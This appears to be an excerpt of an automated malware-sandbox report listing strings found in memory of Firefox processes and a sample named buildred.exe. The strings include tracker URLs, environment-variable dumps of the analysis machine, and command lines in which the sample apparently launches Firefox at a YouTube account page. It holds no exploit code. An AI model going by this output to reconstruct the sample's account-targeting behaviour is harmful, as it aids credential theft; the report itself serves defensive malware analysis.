Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://connect.facebook.net//sdk.js""://.imgur.io/js/vendor..bundle.js""://auth.9c9media.ca/auth/main.js""https://smartblock.firefox.etp/play.svg""://static.adsafeprotected.com/iasPET.1.js""://adservex.media.net/videoAds.js""://.moatads.com//moatapi.js""://static.chartbeat.com/js/chartbeat.js""://connect.facebook.net//all.js""://.moatads.com//moatheader.js""://www.rva311.com/static/js/main..chunk.js""://cdn.optimizely.com/public/.js""://.vidible.tv//vidible-min.js""://www.google-analytics.com/gtm/js""://c.amazon-adsystem.com/aax2/apstag.js""://www.googletagservices.com/tag/js/gpt.js""://www.google-analytics.com/analytics.js""://imasdk.googleapis.com/js/sdkloader/ima3.js""://cdn.adsafeprotected.com/iasPET.1.js""://www.googletagmanager.com/gtm.js""://libs.coremetrics.com/eluminate.js""://js.maxmind.com/js/apis/geoip2//geoip2.js""://s.webtrends.com/js/advancedLinkTracking.js""://static.chartbeat.com/js/chartbeat_video.js""://.imgur.com/js/vendor..bundle.js""://s0.2mdn.net/instream/html5/ima3.js""://www.google-analytics.com/plugins/ua/ec.js""://www.everestjs.net/static/st.v3.js""://cdn.branch.io/branch-latest.min.js""://ssl.google-analytics.com/ga.js""://pub.doubleverify.com/signals/pub.js""://static.criteo.net/js/ld/publishertag.js""://.adsafeprotected.com/jload?""://s.webtrends.com/js/webtrends.js""://track.adform.net/Serving/TrackPoint/""://pubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/.js""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com//Serving/""://pubads.g.doubleclick.net/gampad/ad-blk""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com/tpl?""://s.webtrends.com/js/webtrends.min.js""://pixel.advertising.com/firefox-etp""://pubads.g.doubleclick.net/gampad/ad-blk""://vast.adsafeprotected.com/vast""://securepubads.g.doubleclick.net/gampad/ad""://vast.adsafeprotected.com/vast""://www.facebook.com/platform/impression.php""://pubads.g.doubleclick.net/gampad/ad""://securepubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/.png""://ads.stickyadstv.com/auto-user-sync""://pixel.advertising.com/firefox-etp""://.adsafeprotected.com//imp/""://.adsafeprotected.com//unit/""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/.gif""://.adsafeprotected.com/jsvid""://.adsafeprotected.com/services/pub""://track.adform.net/Serving/TrackPoint/""://www.facebook.com/platform/impression.php""://.adsafeprotected.com/jload""://.adsafeprotected.com//adj""://.adsafeprotected.com//adj""://.adsafeprotected.com/.gif""://ads.stickyadstv.com/auto-user-sync""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com/.png""://.adsafeprotected.com//unit/""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com//Serving/""://.adsafeprotected.com/jload""://.adsafeprotected.com/jload?""://.adsafeprotected.com/.js""://.adsafeprotected.com/jsvid""*://
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://pagead2.googlesyndication.com/gpt/pubads_impl_.js""https://www.amazon.com/exec/obidos/external-search/""://securepubads.g.doubleclick.net/gpt/pubads_impl_.js""://id.rambler.ru/rambler-id-helper/auth_events.js""://media.richrelevance.com/rrserver/js/1.2/p13n.js"FTP support was removed from Firefox in bug 1574475Please use $(ref:SecurityInfo.overridableErrorCategory)."://pagead2.googlesyndication.com/tag/js/gpt.js"An unexpected property was found in the WebExtension manifest."://track.adform.net/serving/scripts/trackpoint/" equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://www.facebook.com/platform/impression.php" equals www.facebook.com (Facebook)
Source: buildred.exe, 0000001A.00000002.2956306224.000000000854C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"_ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qN"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qN"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountt-]q equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qQ"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qQ"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"t-]q equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qxID: 5652, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qxID: 7092, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q{ID: 7440, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2719579662.000001E53ADCB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2766918700.000001E53ADCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: '98p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://web-assets.toggl.com/app/assets/scripts/.jswebcompat-reporter%40mozilla.org:1.5.1://connect.facebook.net//sdk.jsresource://gre/modules/FileUtils.sys.mjs://www.rva311.com/static/js/main..chunk.js://connect.facebook.net//all.js://static.chartbeat.com/js/chartbeat.js://cdn.branch.io/branch-latest.min.js://www.googletagmanager.com/gtm.js://www.google-analytics.com/plugins/ua/ec.js://ssl.google-analytics.com/ga.js@mozilla.org/addons/addon-manager-startup;1://www.google-analytics.com/analytics.jsresource://gre/modules/addons/XPIProvider.jsm://s0.2mdn.net/instream/html5/ima3.js://libs.coremetrics.com/eluminate.js://imasdk.googleapis.com/js/sdkloader/ima3.js://.imgur.com/js/vendor..bundle.js://www.google-analytics.com/gtm/js://www.googletagservices.com/tag/js/gpt.js://.imgur.io/js/vendor..bundle.jsFileUtils_closeSafeFileOutputStream://c.amazon-adsystem.com/aax2/apstag.jshttps://smartblock.firefox.etp/play.svg://static.chartbeat.com/js/chartbeat_video.js://track.adform.net/serving/scripts/trackpoint/https://smartblock.firefox.etp/facebook.svg://www.everestjs.net/static/st.v3.js*://pub.doubleverify.com/signals/pub.jsFileUtils_closeAtomicFileOutputStream://auth.9c9media.ca/auth/main.js://static.criteo.net/js/ld/publishertag.jsFX_SESSION_RESTORE_ALL_FILES_CORRUPT equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2878323682.0000026181BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2927921411.0000026194B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2919430058.0000026193B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2888379941.000002618F03A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows"" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000003.2744972040.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows? equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2708137723.000001E539280000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2751984387.000001E539282000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsf equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.2855549826.00000130BDB54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2760124251.000001E539530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsfz equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevationN equals www.youtube.com (Youtube)
